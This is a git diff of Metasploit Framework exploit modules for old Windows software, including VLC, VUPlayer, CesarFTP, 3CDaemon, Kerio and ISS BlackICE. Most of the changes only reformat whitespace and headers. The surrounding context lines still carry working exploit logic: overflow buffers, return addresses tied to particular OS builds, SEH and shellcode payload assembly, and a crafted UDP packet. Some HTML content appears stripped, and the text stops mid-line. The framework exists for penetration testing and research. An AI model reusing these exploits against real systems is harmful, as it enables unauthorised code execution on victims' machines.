a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index d16093b713..5447060da9 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow', @@ -19,13 +23,13 @@ class Metasploit3 < Msf::Exploit::Remote The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges - of the user. This control is not marked safe for scripting, please choose your + of the user. This control is not marked safe for scripting, please choose your attack vector carefully. }, 'License' => MSF_LICENSE, - 'Author' => [ 'dean ' ], + 'Author' => [ 'dean ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-6898' ], [ 'OSVDB', '55945'], @@ -43,25 +47,25 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP3 / IE 7', { 'Ret' => 0x0c0c0c0c } ] + [ 'Windows XP SP3 / IE 7', { 'Ret' => 0x0c0c0c0c } ] ], 'DisclosureDate' => 'Dec 29 2008', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), - ], self.class) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), + ], self.class) end - + def exploit - + # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + # Set the return. ret = Rex::Text.uri_encode([target.ret].pack('L')) - + # Randomize the javascript variable names. vname = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(30) + 2) @@ -74,33 +78,31 @@ class Metasploit3 < Msf::Exploit::Remote rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) - content = %Q| - - - - - | + content = %Q| + + + +| - # create the file + # create the file print_status("Creating '#{datastore['FILENAME']}' file ...") - + file_create(content) - + end end - diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 433691c535..ffa5ede535 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -180,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we have an array of offets, handle it specially seh_offset = target['Offset'] - if (seh_offset.is_a?(::Array)) + if (seh_offset.is_a?(::Array)) # Multiple offets that can be used simultaneously seh_offset.each { |off| seh = generate_seh_record(target.ret) diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index baf50c30f7..b3dfc4bdc6 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote # The EXE base addr contains a bad char (nul). This prevents us from # writing data after the return address. NOTE: An SEH exploit was # originally created for this vuln, but was tossed in favor of using - # the return address method instead. This is due to the offset being + # the return address method instead. This is due to the offset being # stable across different open methods. [ 'Windows - UltraISO v8.6.2.2011 portable', diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 703cabc67d..9fc3243b26 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,16 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'URSoft W32Dasm Disassembler Function Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in W32Dasm <= v8.93. - By creating a malicious file and convincing a user to disassemble - the file with a vulnerable version of W32Dasm, the Imports/Exports - function is copied to the stack and arbitrary code may be executed - locally as the user. + By creating a malicious file and convincing a user to disassemble + the file with a vulnerable version of W32Dasm, the Imports/Exports + function is copied to the stack and arbitrary code may be executed + locally as the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'patrick' ], @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 256, @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP SP0', { 'Ret' => 0x77e6de9c } ], # jmp esp kernel32.dll ], @@ -55,11 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 24 2005', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf-w32dasm.exe']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf-w32dasm.exe']), + ], self.class) end def exploit diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index d8dc34c545..9629f79829 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,14 +15,14 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'VideoLAN VLC TiVo Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in VideoLAN VLC 0.9.4. - By creating a malicious TY file, a remote attacker could overflow a - buffer and execute arbitrary code. + By creating a malicious TY file, a remote attacker could overflow a + buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => 'MC', @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 550, @@ -40,43 +44,42 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'VideoLAN VLC 0.9.4 (XP SP3 English)', { 'Ret' => 0x6a575cad } ], - [ 'VideoLAN VLC 0.9.2 (XP SP3 English)', { 'Ret' => 0x65473351 } ], + [ 'VideoLAN VLC 0.9.2 (XP SP3 English)', { 'Ret' => 0x65473351 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 22 2008', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.ty']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.ty']), + ], self.class) end def exploit - ty = "\xF5\x46\x7A\xBD" + ty = "\xF5\x46\x7A\xBD" ty << "\x00\x00\x00\x02" - ty << "\x00\x02\x00\x00" + ty << "\x00\x02\x00\x00" ty << "\x00" * 8 - ty << "\x00\x00\x05\x41" - ty << "\x00" * 4 - ty << "\x00\x00\x05\x49" - ty << "\x00" * 60 + ty << "\x00\x00\x05\x41" + ty << "\x00" * 4 + ty << "\x00\x00\x05\x49" + ty << "\x00" * 60 ty << [target.ret].pack('V') + payload.encoded + make_nops(12) - ty << "\x00" * (130980 - 4 - payload.encoded.length - 12) - ty << "\x05" - ty << "\x00" * 3 - ty << "\x05" - ty << "\x00" * 1 - ty << "\x09" - ty << "\xc0" + ty << "\x00" * (130980 - 4 - payload.encoded.length - 12) + ty << "\x05" + ty << "\x00" * 3 + ty << "\x05" + ty << "\x00" * 1 + ty << "\x09" + ty << "\xc0" ty << "\x00" * 14 - ty << "\x06" - ty << "\xe0" + ty << "\x06" + ty << "\xe0" ty << "\x00" * 302004 print_status("Creating '#{datastore['FILENAME']}' file ...") diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index d76c2e579c..d3bcbb9457 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, - 'EncoderOptions' => + 'EncoderOptions' => { 'BufferRegister' => 'ESI', } @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote # add esp,0xcc / pop ebx / pop esi / pop edi / pop ebp / ret # esi is used as our buffer register, and also becomes eip # (there are two copies of the pointer on the stack) - 'Ret' => 0x6b54543e, + 'Ret' => 0x6b54543e, } ], ], @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote host,share = psz_remote[2,psz_remote.length].split("\\") path = "smb://%s@%s/%s/" % [payload.encoded, host, share] sploit = template.gsub(/REPLACE_ME/, path) - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index dabd3010b4..5dda512419 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'VUPlayer M3U Buffer Overflow', @@ -30,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 750, @@ -39,19 +43,18 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ], + [ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 18 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), + ], self.class) end def exploit @@ -61,11 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote m3u[1012,4] = [target.ret].pack('V') m3u[1016,12] = "\x90" * 12 m3u[1028,payload.encoded.length] = payload.encoded - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(m3u) - + end end diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index e6089e409f..27abf20bb1 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -22,10 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Zinf Audio Player 2.2.1 (PLS File) Stack Overflow.', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. - An attacker must send the file to victim and the victim must open the file. - Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Zinf. - This functionality has not been tested in this module. + An attacker must send the file to victim and the victim must open the file. + Alternatively it may be possible to execute code remotely via an embedded + PLS file within a browser, when the PLS extention is registered to Zinf. + This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ', 'patrick' ], @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Tested by patrick - 20090429 xpsp3 [ 'Zinf Universal 2.2.1', { 'Ret' => 0x1204f514 } ], #pop esi; pop ebx; ret - ./Plugins/zinf.ui @@ -54,10 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => '24 Sep 2004', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'exploit_zinf.pls']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'exploit_zinf.pls']), + ], self.class) end diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index 20565ee89a..db0a4d3802 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -22,20 +20,20 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ISS PAM.dll ICQ Parser Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the ISS products that use - the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation - will result in arbitrary code execution as LocalSystem. This exploit - only requires 1 UDP packet, which can be both spoofed and sent to a broadcast - address. + This module exploits a stack overflow in the ISS products that use + the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation + will result in arbitrary code execution as LocalSystem. This exploit + only requires 1 UDP packet, which can be both spoofed and sent to a broadcast + address. - The ISS exception handler will recover the process after each overflow, giving - us the ability to bruteforce the service and exploit it multiple times. + The ISS exception handler will recover the process after each overflow, giving + us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2004-0362'], ['OSVDB', '4355'], ['URL', 'http://www.eeye.com/html/Research/Advisories/AD20040318.html'], @@ -55,26 +53,26 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Bruteforce', { } ], [ 'Bruteforce iis-pam1.dll', { 'Targets' => 3 .. 4 } ], [ 'Bruteforce NT 4.0', { 'Targets' => 5 .. 15 } ], - [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ], - [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ], - [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ], - [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ], - [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ], - [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ], - [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ], - [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ], - [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ], - [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ], - [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ], - [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ], + [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ], + [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ], + [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ], + [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ], + [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ], + [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ], + [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ], + [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ], + [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ], + [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ], + [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ], + [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ], [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], - [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ], - [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ], - [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ], + [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ], + [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ], + [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ], - [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], - [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ], - [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ], + [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], + [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ], + [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ], ], 'DisclosureDate' => 'Mar 18 2004', 'DefaultTarget' => 0)) @@ -116,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # (skape) if it doesn't work! packet = # SRV_MULTI - [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + + [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + # SRV_USER_ONLINE [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') + [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + @@ -126,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x00" + # nick length / nick "\x00\x00" + # first length / first "\x00\x00" + # last length / last - [email.length].pack('v') + email + + [email.length].pack('v') + email + "\x00\x00\x00\x00\x00\x00\x00" print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)") diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 57fec55c7f..e6e2022e6b 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -3,36 +3,32 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp - def initialize(info = {}) super(update_info(info, 'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow', 'Description' => %q{ - This module exploits a stack overflow in Kerio Personal Firewall - administration authentication process. This module has only been tested + This module exploits a stack overflow in Kerio Personal Firewall + administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4). - }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2003-0220'], ['OSVDB', '6294'], ['BID', '7180'], @@ -49,25 +45,20 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ], - [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], + [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'April 28 2003', - 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(44334) - ], self.class) - + register_options( + [ + Opt::RPORT(44334) + ], self.class) end def exploit diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 6000b1452f..e5b0e41582 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,14 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow', 'Description' => %q{ - This module exploits a vulnerability in the 3Com 3CDaemon + This module exploits a vulnerability in the 3Com 3CDaemon FTP service. This package is being distributed from the 3Com web site and is recommended in numerous support documents. This module uses the USER command to trigger the overflow. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -39,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '12811'], [ 'BID', '12155'], [ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'], - ], 'Privileged' => false, 'Payload' => @@ -51,11 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote { 'ConnectionType' => "-find" } - }, - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 English', # Tested OK - hdm 11/24/2005 { 'Platform' => 'win', @@ -74,40 +69,40 @@ class Metasploit3 < Msf::Exploit::Remote { 'Platform' => 'win', 'Ret' => 0x77681799, # ws2help.dll - }, + }, ], - [ - 'Windows 2000 Pro SP4 French', + [ + 'Windows 2000 Pro SP4 French', { 'Platform' => 'win', 'Ret' => 0x775F29D0, - }, + }, ], - + ], 'DisclosureDate' => 'Jan 4 2005')) end def check connect - disconnect + disconnect if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect - + print_status("Trying target #{target.name}...") buf = rand_text_english(2048, payload_badchars) - seh = generate_seh_payload(target.ret) + seh = generate_seh_payload(target.ret) buf[229, seh.length] = seh send_cmd( ['USER', buf] , false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index ee2e3f89e3..1809f9ef19 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Cesar FTP 0.99g MKD Command Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the MKD verb in CesarFTP 0.99g. - - You must have valid credentials to trigger this vulnerability. Also, you + + You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully. }, 'Author' => 'MC', @@ -49,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ], [ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ], @@ -64,19 +62,19 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect - + disconnect + if (banner =~ /CesarFTP 0\.99g/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect_login - sploit = "\n" * 671 + rand_text_english(3, payload_badchars) - sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded + sploit = "\n" * 671 + rand_text_english(3, payload_badchars) + sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index d49a08136e..ff0081e79f 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -3,25 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BolinTech Dream FTP Server 1.02 Format String', 'Description' => %q{ - This module exploits a format string overflow in the BolinTech + This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined. }, 'Author' => [ 'Patrick Webster ' ], @@ -45,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en. + # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en. [ 'Dream FTP Server v1.02 Universal', { @@ -55,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Mar 03 2004', 'DefaultTarget' => 0)) - - register_options( + + register_options( [ Opt::RPORT(21), ], self.class) @@ -71,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe end - + def exploit connect sleep(0.25) diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index a9a04cf818..98903dfe7b 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -3,23 +3,21 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Easy File Sharing FTP Server 2.0 PASS Overflow', 'Description' => %q{ This module exploits a stack overflow in the Easy File Sharing 2.0 @@ -48,38 +46,38 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', 'Targets' => - [ - [ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ], - [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], - ], + [ + [ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ], + [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], + ], 'DisclosureDate' => 'Jul 31 2006', 'DefaultTarget' => 0)) end - def check - connect - disconnect + def check + connect + disconnect + + if (banner =~ /Easy File Sharing FTP Server/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end - if (banner =~ /Easy File Sharing FTP Server/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe - end - def exploit connect - filler = rand_text_english(2559) + "\xeb\x12" + filler = rand_text_english(2559) + "\xeb\x12" filler << make_nops(2) + [target.ret].pack('V') - - sploit = "\x2c" + filler + payload.encoded + + sploit = "\x2c" + filler + payload.encoded print_status("Trying target #{target.name}...") # needs anonymous to be set. send_cmd(['USER', "anonymous"], true) send_cmd(['PASS', sploit], false) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index 77b18b519a..8076d8ff04 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'EasyFTP Server <= 